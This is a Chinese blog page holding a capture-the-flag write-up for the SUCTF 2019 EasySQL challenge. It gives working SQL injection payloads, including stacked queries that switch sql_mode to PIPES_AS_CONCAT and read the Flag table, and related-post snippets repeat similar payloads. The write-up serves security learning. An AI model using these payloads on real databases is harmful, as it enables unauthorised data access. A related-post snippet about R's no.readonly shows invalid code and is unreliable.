NO.6 [SUCTF 2019]EasySQL

最新推荐文章于 2022-10-26 23:20:28 发布
最新推荐文章于 2022-10-26 23:20:28 发布
阅读量219 收藏
点赞数
分类专栏: BUUCTF SQL注入
原文链接:https://blog.csdn.net/weixin_44866139/article/details/105857487
版权

这道题目需要我们去对后端语句进行猜测

1、输入非零数字得到的回显1和输入其余字符得不到回显=>来判断出内部的查询语句可能存在有||

2、也就是select 输入的数据||内置的一个列名 from 表名=>即为

    select post进去的数据||flag from Flag(含有数据的表名,通过堆叠注入可知)

此时的||起到的作用是or的作用

解法1
内置的sql语句为

sql=“select”.post[‘query’]."||flag from Flag";

如果$post[‘query’]的数据为*,1,sql语句就变成了

select *,1||flag from Flag

也就是

select *,1 from Flag

也就是直接查询出了Flag表中的所有内容
在这里插入图片描述

解法2
输入的内容为

1;set sql_mode=pipes_as_concat;select 1

在这里插入图片描述

我们执行的语句分别为

select 1
set sql_mode=pipes_as_concat
select 1||flag from Flag

读出flag
在这里插入图片描述
??一些疑惑:

**为啥select ,1||flag from Flag = select ,1 from Flag?

select 1 from table;的结果是什么?
在这里插入图片描述在这里插入图片描述


可以看到,查询结果为列名为1,一共六行

select任何一个常数都会在表中新建一列,然后查询出那一列的内容。

结论:
select 1 from Flag的结果就是一排1,这一排有几个数据取决于表的行数多少。

这篇博客有介绍:https://www.cnblogs.com/jiechn/p/3979261.html

在这里插入图片描述


 

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
周五的SQL注入作业
qq_44640313的博客
12-03 324
sql注入的基础题,整数型和字符型
buuctf-[SUCTF 2019]EasySQL 1(小宇特详解)
小宇的web博客
01-15 4791
buuctf-[SUCTF 2019]EasySQL 1(小宇特详解) 解法1 这里先用的是万能密码,发现不能使用,然后使用堆叠注入发现能够进行 堆叠注入查询数据库 1; show databases; 查询表名 1; show tables; 这里尝试直接访问Flag 1;show columns from Flag;# 发现不行 这里是最迷的一个地方,这里大佬能够猜出查询语句 select $_GET['query'] || flag from flag 这里的||在mysql中表示或,如果
BUUCTF [SUCTF 2019]EasySQL1 writeup(详细版)
热门推荐
m0_62851980的博客
04-10 1万+
考点:堆叠注入,MySQL和mssql中||运算符的区别,运算符的意义转换(操作符重置) 打开靶机,尝试输入1查看回显: 可以看到表格回显了内容:1,用其他非0数字尝试全都回显1,那我们换个数字尝试,比如0: 什么都没有。 使用Sql堆叠注入查看信息,先用show指令查看数据库:1;show databases; 再查看一下表:1;show tables; 看到Flag表,猜测flag应该在Flag中。 但是直接select flag from Flag查询是查不...
BUUCTF--Web--[SUCTF 2019]EasySQL
weixin_44866139的博客
04-30 7695
猜测后端执行SQL语句 输入1,有回显 输入2,有回显,输入非零数字都有回显,输入字母无回显 输入1’,没回显,应该存在sql注入,猜测可能关闭了错误回显,报错注入可能行不通了 用order去试探有多少个字段,返回的都是Nonono,可能order by 参数被过滤了,联合查询就行不通了 排除了报错注入和联合查询注入,试下盲注,布尔盲注 1 and length(database())>=...
【BUUCTF】Web题解
xuanyulevel6的博客
08-08 5014
【BUUCTF】Web题解
no6.rar_6no.c
09-19
高集成的编辑器调整 C 和 DSP 汇编代码: CCS5000 的内建编辑器支持 C 和汇编文件的动态语法加亮显示。使用户能很容 易地阅读代码和当场发现语法错误。
操作系统习题汇集no.pdf
01-03
操作系统习题汇集no.pdf
校园No.1竞赛系列软件:速算全能
04-07
这是我设计,刘进军制作的校园No.1竞赛软件。100道四则运算题,看谁最快完成。
NO.6行车控制柜.zip
06-03
NO.6行车控制柜.zipNO.6行车控制柜.zipNO.6行车控制柜.zip
No.7_qzhai.zip
05-25
wordpress模板极简主题。 WordPress模板的定义非常方便,但是在定制模板之前,我们有必要知道WordPress的模板层次,了解WordPress是如何加载模板文件的,这将有利于开发模板时合理利用资源及提高工作效率。
SUCTF】web 2019 EasySQL 1(SQL堆叠注入+select 1 from的用法+sql_mode=PIPES_AS_CONCAT)
weixin_45844670的博客
10-14 298
先观察页面,发现是post方法传参 我们先提交一个数字 发现会显示内容,但是输出字母却什么都不显示 进行其他的一些操作也不管用 查看wp 发现是堆叠查询 1;show databases; #查库 1;show tables; #查表 此处关键的代码查询就是select $post['query']||flag from Flag 我们需要想办法让 || 不是逻辑或 官方给的 payload 是1;set sql_mode=PIPES_AS_CONCAT;select 1 拼接一下就是se
为什么select * || flag from flag 不行呢?
wojiushilsy的博客
04-27 1512
首先*(星号)在SQL语句中有特殊的意义。应该是保留字或关键字 (没找到*(星号)属于什么) 。 所以你直接使用 select * || flag from flag 会报语法错误。 实验一: 这是一张表 查询语句 SELECT *||mpassword FROM rjqm.manager; 结果: 和查询语句 SELECT .||mpassword FROM rjqm.manager; 结果是...
1.实验吧——sql注入1(flag,到底过滤了什么东西? )
qwsn
11-08 3633
0x01:题目 实验吧——sql注入1网址 题目 http://ctf5.shiyanbar.com/423/web/ flag,到底过滤了什么东西? 0x02:WP复现 1.正常访问: http://ctf5.shiyanbar.com/423/web/ #如下图所示 2.输入单引号'测试: 在输入框里输入:' #如图所示,为GET型注入+字符型注入 http:/...
[SUCTF 2019]EasySQL 1(SQL堆叠注入+select 1 from的用法+sql_mode=PIPES_AS_CONCAT)
Home to come
08-19 5792
(本文为个人刷题记录,不记录完整解题步骤,而是写一下自己的感悟点) 为了准备20/8/20号信安大赛,临阵磨枪刷一下题 SQL堆叠注入   这个就不再写原理了,之前也遇到很多了,就是一个sql语句";"后面可以继续执行sql查询语句。 试一下堆叠注入查询数据库 1;show databases; 查询表名 1;show tables; 这里直接用下面查询FLag表是不行的 1;show columns from Flag;# 接下来就是最迷的步骤,大佬居然可以从报错中猜出查询语句是: select $
BUU的SUCTF 2019 Easysql
小白渣的博客
02-05 3454
呜呜呜~~ ~自己已经好久好久都没有做题和更新博客辽 加上这次的疫情,感jio整个人都要躺发霉辽!!! 下午闲着没事终于开始了做题 打开题目发现是这样的一个页面 第一步还是老样子 先看看源码是什么样子的 应该是发现不了什么东西 我们发现是post 方法传参 我们可以发现 1;show databases; #查库 1;show tables; #查表 可以发现只有一个Flag...
[SUCTF 2019]EasySQL 1
Huamang的博客
01-31 735
堆叠注入 尝试万能密码没用后尝试堆叠注入,就是语句用;隔开 返回了所有的库 返回了当前库的表 查看表Flag的定义的时候失败了 select 1 from table 这个题目涉及到一个操作select 1 from table select 1 from table增加临时列,每行的列值是写在select后的数,这条sql语句中是1 1是一常量(可以为任意数值) 一般是作条件查询用的 一般用来当做判断子查询是否成功(即是否有满足条件的时候使用) 看了大佬的wp,他们猜出语句大概是这样 select
[SUCTF 2019]EasySQL
weixin_42346836的博客
10-31 129
关键的查询代码是 select $post['query']||flag from Flag 输入的内容为*,1* sql语句就变成了select *,1||flag from Flag(此时||是逻辑或)也就是select *,1 from Flag,也就是直接查询出了Flag表中的所有内 输入 1 或 0 查询结果如图,要想办法让 ||不是逻辑或 官方给的 payload 是1;set sql_mode=PIPES_AS_CONCAT;select 1 拼接一下就是select 1;set sq
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1445
SQL注入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
每周刷题(二)
qidiandexiaowu
09-26 444
题目来源:BUUCTF 目录[强网杯 2019]随便注 [强网杯 2019]随便注 先判断是否有注入点,试一下1' 注入点找到了 然后判断出列数 222222 再用1' union select 1,database(); #出现了报错 select等字符被过滤了,正常注入不能用,报错注入也不行! 看了下大师傅的WP尝试用堆叠注入。 我们先构造payload:1' ;show database; # 再次构造payload1' ;show tables; #查看有几个表 只有两个表 从两个表里,
r语言no.readonly
最新发布
04-28
在R语言中,no.readonly是一个逻辑值(logical)参数,用于控制是否允许对只读对象进行修改。当no.readonly参数被设为TRUE时,可以修改只读对象;当no.readonly参数被设为FALSE时,无法修改只读对象。需要注意的是,只有在对象被定义时使用了readonly函数才能将其设置为只读对象。以下是一个示例: ``` # 创建一个只读向量 v <- readonly(c(1, 2, 3), lock=TRUE) # 尝试修改只读向量 v[1] <- 4 # Error in v[1] <- 4 : # object 'v' is read-only # 使用no.readonly参数修改只读向量 v[1] <- 4, no.readonly = TRUE # [1] 4 2 3 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值